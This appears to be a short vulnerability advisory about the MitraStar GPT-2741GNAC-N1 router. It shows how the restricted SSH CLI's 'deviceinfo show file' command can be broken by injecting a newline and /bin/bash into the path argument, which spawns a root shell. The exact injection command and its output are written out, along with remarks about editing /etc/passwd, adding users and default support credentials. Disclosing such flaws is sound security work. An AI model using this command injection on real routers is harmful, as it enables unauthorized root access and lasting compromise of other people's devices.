2023-01-22 15:55:10 -03:00
2023-01-22 15:55:10 -03:00

Privilege escalation MitraStar Router GPT-2741GNAC-N1

Vulnerability on MitraStar routers

Device: MitrastarGPT-2741GNAC-N1

Firmware: BR_g5.9_1.11(WVK.0)b32 (not tested in other version)


Mitrastar GPT-2741GNAC-N1 devices are provided with access through ssh into a restricted default shell:

C:\Users\<username>\ssh support@
support@'s password:

The restricted shell has CLI Version Reduced_CLI_HGU_v14, and the environment is restricted to avoid execution of common linux/unix commands.

>show device_model
device_model GPT-2741GNAC
>show cli_version
cli_version Reduced_CLI_HGU_v14

The command deviceinfo show file is supposed to be used from reduced CLI to show files and directories. Because this command do not handle correctly special characters, is possible to insert a second command as a parameter in the "path" value. Using "\n /bin/bash" as a parameter value, we can generate a console with root access, as seen below:

> deviceinfo show file "\n /bin/bash"
app             bosa            data            etc             lib             mini_httpdroot  sbin            tmp             usr
bin             bosabackup      dev             fwbuffer        linuxrc         proc            sys             userfs          var

So it is possible to escalate privileges by spawning a full interoperable console with root privileges

Through this escalation we can change the content of /etc/passwd or (/var/passwd), create new users, or change any other system resource permanently.

The user support is provided printed on the back of the router. In some cases, this routers use default credentials.

Privilege Escalation MitraStar GPT-2741GNAC-N1
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